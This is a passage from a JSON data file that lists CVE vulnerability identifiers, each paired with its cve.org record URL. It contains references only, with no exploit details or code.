"url": "https://www.cve.org/CVERecord?id=CVE-2026-1002"
},
{
"name": "CVE-2026-23128",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23128"
},
{
"name": "CVE-2024-57975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57975"
},
{
"name": "CVE-2023-53574",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53574"
},
{
"name": "CVE-2022-50166",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50166"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2024-56738",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56738"
},
{
"name": "CVE-2022-50778",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50778"
},
{
"name": "CVE-2024-42067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42067"
},
{
"name": "CVE-2022-49971",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49971"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2025-21693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21693"
},
{
"name": "CVE-2025-71203",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71203"
},
{
"name": "CVE-2024-56657",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56657"
},
{
"name": "CVE-2025-39789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39789"
},
{
"name": "CVE-2022-49124",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49124"
},
{
"name": "CVE-2024-49901",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49901"
},
{
"name": "CVE-2023-52700",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52700"
},
{
"name": "CVE-2024-56583",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56583"
},
{
"name": "CVE-2022-50195",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50195"
},
{
"name": "CVE-2025-40358",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40358"
},
{
"name": "CVE-2024-40998",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40998"
},
{
"name": "CVE-2024-56712",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56712"
},
{
"name": "CVE-2025-68318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68318"
},
{
"name": "CVE-2022-49980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49980"
},
{
"name": "CVE-2023-52634",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52634"
},
{
"name": "CVE-2025-22104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22104"
},
{
"name": "CVE-2022-2795",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2795"
},
{
"name": "CVE-2025-62526",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62526"
},
{
"name": "CVE-2024-49918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49918"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2023-53785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53785"
},
{
"name": "CVE-2024-45776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45776"
},
{
"name": "CVE-2022-50090",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50090"
},
{
"name": "CVE-2025-40340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40340"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2020-14356",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14356"
},
{
"name": "CVE-2025-68745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68745"
},
{
"name": "CVE-2023-54263",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54263"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2023-53764",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53764"
},
{
"name": "CVE-2024-53687",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53687"
},
{
"name": "CVE-2025-39901",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39901"
},
{
"name": "CVE-2025-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40283"
},
{
"name": "CVE-2025-5918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
},
{
"name": "CVE-2024-38628",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38628"
},
{
"name": "CVE-2025-40324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40324"
},
{
"name": "CVE-2025-38672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38672"
},
{
"name": "CVE-2023-54181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54181"
},
{
"name": "CVE-2025-0684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0684"
},
{
"name": "CVE-2025-10158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10158"
},
{
"name": "CVE-2025-68378",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68378"
},
{
"name": "CVE-2024-47794",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47794"
},
{
"name": "CVE-2026-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23146"
},
{
"name": "CVE-2025-38272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38272"
},
{
"name": "CVE-2024-10524",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
},
{
"name": "CVE-2025-40146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40146"
},
{
"name": "CVE-2025-38359",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38359"
},
{
"name": "CVE-2019-20794",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20794"
},
{
"name": "CVE-2023-53849",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53849"
},
{
"name": "CVE-2022-4543",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4543"
},
{
"name": "CVE-2025-21899",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21899"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2023-53627",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53627"
},
{
"name": "CVE-2025-40250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40250"
},
{
"name": "CVE-2025-38091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38091"
},
{
"name": "CVE-2023-53510",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53510"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2025-38334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38334"
},
{
"name": "CVE-2023-53575",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53575"
},
{
"name": "CVE-2022-49516",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49516"
},
{
"name": "CVE-2025-40778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40778"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2022-3523",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3523"
},
{
"name": "CVE-2026-26157",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26157"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2023-38417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38417"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-71224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71224"
},
{
"name": "CVE-2025-22072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22072"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2021-45261",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45261"
},
{
"name": "CVE-2025-40074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40074"
},
{
"name": "CVE-2026-23193",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23193"
},
{
"name": "CVE-2025-40321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40321"
},
{
"name": "CVE-2024-47736",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47736"
},
{
"name": "CVE-2023-53037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53037"
},
{
"name": "CVE-2024-46842",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46842"
},
{
"name": "CVE-2025-71237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71237"
},
{
"name": "CVE-2025-13462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
},
{
"name": "CVE-2024-50112",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50112"
},
{
"name": "CVE-2025-69646",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69646"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2026-23215",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23215"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2020-26142",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26142"
},
{
"name": "CVE-2022-49955",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49955"
},
{
"name": "CVE-2023-53628",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53628"
},
{
"name": "CVE-2025-29943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29943"
},
{
"name": "CVE-2025-39978",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39978"
},
{
"name": "CVE-2023-31346",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31346"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2025-38071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38071"
},
{
"name": "CVE-2025-38140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38140"
},
{
"name": "CVE-2022-50002",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50002"
},
{
"name": "CVE-2025-38621",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38621"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2025-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39908"
},
{
"name": "CVE-2026-24842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
},
{
"name": "CVE-2024-49920",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49920"
},
{
"name": "CVE-2025-40282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40282"
},
{
"name": "CVE-2026-23118",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23118"
},
{
"name": "CVE-2025-34034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-34034"
},
{
"name": "CVE-2025-37984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37984"
},
{
"name": "CVE-2025-59692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59692"
},
{
"name": "CVE-2022-50116",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50116"
},
{
"name": "CVE-2018-12931",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12931"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2025-37856",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37856"
},
{
"name": "CVE-2022-50224",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50224"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2020-13791",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13791"
},
{
"name": "CVE-2026-23950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
},
{
"name": "CVE-2024-49990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49990"
},
{
"name": "CVE-2020-15802",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15802"
},
{
"name": "CVE-2020-24240",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24240"
},
{
"name": "CVE-2024-46718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46718"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2024-41045",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41045"
},
{
"name": "CVE-2023-53545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53545"
},
{
"name": "CVE-2022-50552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50552"
},
{
"name": "CVE-2021-0066",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0066"
},
{
"name": "CVE-2025-38333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38333"
},
{
"name": "CVE-2023-53376",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53376"
},
{
"name": "CVE-2023-53538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53538"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2022-50357",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50357"
},
{
"name": "CVE-2024-57952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57952"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2023-52671",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52671"
},
{
"name": "CVE-2022-50303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50303"
},
{
"name": "CVE-2024-35870",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35870"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2026-23221",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23221"
},
{
"name": "CVE-2025-38059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38059"
},
{
"name": "CVE-2024-27014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27014"
},
{
"name": "CVE-2024-36013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36013"
},
{
"name": "CVE-2024-53176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53176"
},
{
"name": "CVE-2025-37956",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37956"
},
{
"name": "CVE-2025-40196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40196"
},
{
"name": "CVE-2024-49880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49880"
},
{
"name": "CVE-2023-52676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52676"
},
{
"name": "CVE-2025-38117",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38117"
},
{
"name": "CVE-2017-13165",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-13165"
},
{
"name": "CVE-2025-38556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38556"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2025-39932",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39932"
},
{
"name": "CVE-2024-47683",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47683"
},
{
"name": "CVE-2023-6237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
},
{
"name": "CVE-2024-46811",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46811"
},
{
"name": "CVE-2025-21985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21985"
},
{
"name": "CVE-2025-22109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22109"
},
{
"name": "CVE-2025-38300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38300"
},
{
"name": "CVE-2025-40040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40040"
},
{
"name": "CVE-2023-53635",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53635"
},
{
"name": "CVE-2025-39810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39810"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-23132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23132"
},
{
"name": "CVE-2024-47678",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47678"
},
{
"name": "CVE-2022-49531",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49531"
},
{
"name": "CVE-2022-49504",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49504"
},
{
"name": "CVE-2025-1376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
},
{
"name": "CVE-2022-49810",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49810"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-71109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71109"
},
{
"name": "CVE-2023-26586",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26586"
},
{
"name": "CVE-2025-38373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38373"
},
{
"name": "CVE-2025-66861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66861"
},
{
"name": "CVE-2025-40095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40095"
},
{
"name": "CVE-2025-37957",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37957"
},
{
"name": "CVE-2025-38369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38369"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-44950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44950"
},
{
"name": "CVE-2025-39759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39759"
},
{
"name": "CVE-2022-50332",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50332"
},
{
"name": "CVE-2023-53822",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53822"
},
{
"name": "CVE-2024-27408",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27408"
},
{
"name": "CVE-2025-71222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71222"
},
{
"name": "CVE-2022-50461",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50461"
},
{
"name": "CVE-2025-21801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21801"
},
{
"name": "CVE-2023-26554",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26554"
},
{
"name": "CVE-2025-38486",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38486"
},
{
"name": "CVE-2021-26934",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26934"
},
{
"name": "CVE-2023-53466",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53466"
},
{
"name": "CVE-2025-21629",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21629"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-53168",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53168"
},
{
"name": "CVE-2022-49528",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49528"
},
{
"name": "CVE-2025-68160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68160"
},
{
"name": "CVE-2022-45888",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45888"
},
{
"name": "CVE-2022-49218",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49218"
},
{
"name": "CVE-2023-52749",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52749"
},
{
"name": "CVE-2025-39754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39754"
},
{
"name": "CVE-2025-40286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40286"
},
{
"name": "CVE-2022-49967",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49967"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2024-2236",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
},
{
"name": "CVE-2022-49245",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49245"
},
{
"name": "CVE-2025-38098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38098"
},
{
"name": "CVE-2023-52682",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52682"
},
{
"name": "CVE-2022-50871",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50871"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-71229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71229"
},
{
"name": "CVE-2026-23213",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23213"
},
{
"name": "CVE-2025-39958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39958"
},
{
"name": "CVE-2018-8956",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-8956"
},
{
"name": "CVE-2025-40266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40266"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2022-49420",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49420"
},
{
"name": "CVE-2022-40964",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40964"
},
{
"name": "CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"name": "CVE-2026-3441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3441"
},
{
"name": "CVE-2024-36244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36244"
},
{
"name": "CVE-2023-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53149"
},
{
"name": "CVE-2026-23237",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23237"
},
{
"name": "CVE-2024-49987",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49987"
},
{
"name": "CVE-2025-60753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
},
{
"name": "CVE-2022-50746",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50746"
},
{
"name": "CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"name": "CVE-2024-50034",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50034"
},
{
"name": "CVE-2025-38259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38259"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2023-53596",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53596"
},
{
"name": "CVE-2022-49943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49943"
},
{
"name": "CVE-2022-50260",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50260"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2025-67735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67735"
},
{
"name": "CVE-2026-23121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23121"
},
{
"name": "CVE-2020-12319",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12319"
},
{
"name": "CVE-2025-37951",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37951"
},
{
"name": "CVE-2023-50495",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
},
{
"name": "CVE-2024-49568",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49568"
},
{
"name": "CVE-2025-21750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21750"
},
{
"name": "CVE-2024-36924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36924"
},
{
"name": "CVE-2017-11164",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11164"
},
{
"name": "CVE-2023-3397",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3397"
},
{
"name": "CVE-2025-68734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68734"
},
{
"name": "CVE-2024-26672",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26672"
},
{
"name": "CVE-2024-57924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57924"
},
{
"name": "CVE-2025-37947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37947"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2026-0965",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0965"
},
{
"name": "CVE-2023-53806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53806"
},
{
"name": "CVE-2025-21817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21817"
},
{
"name": "CVE-2025-68972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2021-33139",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33139"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-21825",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21825"
},
{
"name": "CVE-2025-38192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38192"
},
{
"name": "CVE-2025-71236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71236"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-39800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39800"
},
{
"name": "CVE-2024-50057",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50057"
},
{
"name": "CVE-2025-38343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38343"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2024-46808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46808"
},
{
"name": "CVE-2026-26158",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26158"
},
{
"name": "CVE-2025-38202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38202"
},
{
"name": "CVE-2025-68288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68288"
},
{
"name": "CVE-2025-38168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38168"
},
{
"name": "CVE-2023-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53547"
},
{
"name": "CVE-2019-20426",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20426"
},
{
"name": "CVE-2025-71107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71107"
},
{
"name": "CVE-2024-0727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
},
{
"name": "CVE-2025-40310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40310"
},
{
"name": "CVE-2026-29786",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29786"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-40083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40083"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2024-56584",
